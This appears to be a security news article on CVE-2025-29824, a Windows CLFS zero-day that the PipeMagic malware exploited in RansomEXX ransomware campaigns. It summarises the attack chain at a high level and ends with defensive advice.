PipeMagic Malware

By Mezo in Malware, Vulnerability

Translate To:

Researchers have uncovered a now-patched security vulnerability within the Windows Common Log File System (CLFS) that was actively exploited as a zero-day attack. This flaw was used in ransomware campaigns targeting specific organizations across multiple industries, including IT and real estate sectors in the United States, financial institutions in Venezuela, a Spanish software company and retail businesses in Saudi Arabia.

Table of Contents

Understanding CVE-2025-29824

Identified as CVE-2025-29824, this vulnerability is a privilege escalation flaw in CLFS that allows attackers to obtain SYSTEM-level privileges. Microsoft addressed and patched the issue during the April 2025 Patch Tuesday update. The cybercriminal group behind these attacks, tracked under the name Storm-2460, deployed a malware strain called PipeMagic to exploit the security vulnerability and deploy ransomware payloads.

How the Attack Unfolded

While the exact method of initial access remains unknown, researchers observed that the attackers used the cert utility to download malware from a compromised third-party website. The malware, a threatening MSBuild file, contained an encrypted payload that, once executed, launched PipeMagic. This plugin-based Trojan, which has been active since 2022, played a central role in facilitating the attack.

This is not the first instance of PipeMagic being used in zero-day exploits. Previously, it abused CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation flaw. It has also been associated with Nokoyawa ransomware attacks that exploited another CLFS zero-day vulnerability, CVE-2023-28252. Additionally, cybersecurity experts reported that in earlier attacks attributed to the same threat actor, PipeMagic was deployed through an MSBuild script before exploiting the CLFS elevation-of-privilege vulnerability.

Exploitation and Its Impact

The attack explicitly targets a vulnerability in the CLFS kernel driver. By exploiting memory corruption and utilizing the RtlSetAllBits API, the attackers overwrite the exploit process’s token with 0xFFFFFFFF, granting full privileges. This allows them to inject unsafe processes into SYSTEM processes, effectively taking control of the infected machine. Following successful exploitation, the threat actors extract user credentials by dumping LSASS memory and encrypting system files with a randomly generated extension. A ransom note containing a TOR domain linked to the RansomEXX ransomware family is then dropped.

Security Measures and Defense

Despite the severity of the attack, Windows 11, version 24H2, is not affected by this specific exploitation. This is due to security restrictions placed on particular System Information Classes within NtQuerySystemInformation, which limit access to users with SeDebugPrivilege, permission typically granted only to administrative users.

Ransomware actors continue to prioritize post-compromise privilege escalation, as it enables them to transform initial access into broader control within a network. By leveraging exploits like CVE-2025-29824, they can escalate their reach, gain privileged access, and deploy ransomware with devastating impact. Organizations must remain vigilant, applying security patches promptly, monitoring for unusual system activity, and enforcing strong access controls to lessen the risks posed by such evolving cyber threats.